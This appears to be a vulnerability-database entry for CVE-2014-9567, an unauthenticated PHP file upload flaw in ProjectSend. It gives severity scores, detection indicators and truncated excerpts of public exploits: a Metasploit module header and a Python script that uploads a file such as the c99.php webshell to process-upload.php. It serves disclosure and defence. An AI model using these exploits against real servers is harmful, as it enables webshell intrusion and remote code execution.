CVE-2014-9567
published 2015-01-07CVE-2014-9567: Unrestricted file upload vulnerability in process-upload.php in ProjectSend (formerly cFTP) r100 through r561 allows remote attackers to execute arbitrary PHP…
PriorityP271high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
43.34%
98.6th percentile
Unrestricted file upload vulnerability in process-upload.php in ProjectSend (formerly cFTP) r100 through r561 allows remote attackers to execute arbitrary PHP code by uploading a file with a PHP extension, then accessing it via a direct request to the file in the upload/files/ or upload/temp/ directory.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
| projectsend | projectsend | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated POST requests to process-upload.php with a PHP file extension in the filename parameter (e.g., ?name=*.php), which indicates exploitation of the unrestricted file upload vulnerability. ↗
- →Alert on HTTP GET requests to upload/files/*.php or upload/temp/*.php, which indicate post-upload execution of a malicious PHP webshell. ↗
- →Flag multipart/form-data POST requests to process-upload.php where the uploaded file part has a .php extension in its filename field, as this is the direct attack vector. ↗
- →A 200 response to a GET on process-upload.php (without POST body) can be used as a check step to fingerprint a vulnerable ProjectSend instance prior to exploitation. ↗
- ·The default TARGETURI for the Metasploit module is '/ProjectSend/', so detection rules scoped to that path prefix may miss instances installed at a different base path. ↗
- ·The upload destination path differs by revision: r-100 to r-219 write to upload/temp/, while r-221 onwards write to upload/files/. Detection must cover both paths. ↗
- ·The vulnerability affects ProjectSend revisions r100 through r561; instances outside this range are not affected and should not trigger the same detection logic. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ProjectSend - Arbitrary File Upload (Metasploit)
exploitdb·2014-12-31
CVE-2014-9567 ProjectSend - Arbitrary File Upload (Metasploit)
ProjectSend - Arbitrary File Upload (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'ProjectSend Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ProjectSend
revisions 100 to 561. The 'process-upload.php' file allows
unauthenticated users to upload PHP files resulting in remote
code execution as the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Fady Mohammed Osman', # Discovery and Exploit
'Brendan Coles ' # Metasploit
],
'References' =>
[
['EDB', '35424']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on ProjectSend revisio
Exploit-DB
ProjectSend r-561 - Arbitrary File Upload
exploitdb·2014-12-02
CVE-2014-9567 ProjectSend r-561 - Arbitrary File Upload
ProjectSend r-561 - Arbitrary File Upload
---
#!/usr/bin/python
# Exploit Title: ProjectSend r-651 File Upload
# Date: December 01, 2014
# Exploit Author: Fady Mohamed Osman (Exploit-db id:2986)
# Vendor Homepage: http://www.projectsend.org/
# Software Link: http://www.projectsend.org/download/67/
# Version: r-561
# Tested on: Kubuntu 14.10 x64
import sys
import requests
scriptName = sys.argv[0]
if (len(sys.argv) != 3):
print "Please enter the target path and the file to upload."
print "Example : " + scriptName + " http://10.0.0.2/ProjectSend-r561 c99.php"
quit()
print "Exploiting ProjectSend-r561 File Upload .."
url = sys.argv[1] + "/" + 'process-upload.php' + '?name=' + sys.argv[2]
print "Sending Url " + url
files = {'file': open(sys.argv[2], 'rb')}
r = requests.post(url, files=file
Metasploit
ProjectSend Arbitrary File Upload
metasploit
ProjectSend Arbitrary File Upload
ProjectSend Arbitrary File Upload
This module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/116469http://packetstormsecurity.com/files/129759/ProjectSend-Arbitrary-File-Upload.htmlhttp://www.exploit-db.com/exploits/35424http://www.exploit-db.com/exploits/35660https://exchange.xforce.ibmcloud.com/vulnerabilities/99548http://osvdb.org/show/osvdb/116469http://packetstormsecurity.com/files/129759/ProjectSend-Arbitrary-File-Upload.htmlhttp://www.exploit-db.com/exploits/35424http://www.exploit-db.com/exploits/35660https://exchange.xforce.ibmcloud.com/vulnerabilities/99548
2015-01-07
Published